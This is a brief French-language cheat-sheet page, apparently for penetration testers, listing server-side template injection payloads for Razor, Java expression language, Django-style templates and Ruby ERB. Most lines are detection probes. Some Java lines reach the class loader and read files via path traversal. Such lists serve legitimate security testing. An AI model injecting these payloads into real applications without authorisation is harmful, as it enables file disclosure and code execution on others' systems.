Aller au contenu

Payloads

ASP.NET Razor

@(1+2)

Execution de commande :

1
2
3
@{
Code en C
}

Java

1
2
3
4
5
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
1
2
3
{% csrf_token %} # doit causer une erreur
{{ 7*7 }}  # doit causer une erreur
ih0vr{{364|add:733}}d121r

Ruby

<%= 7 * 7 %>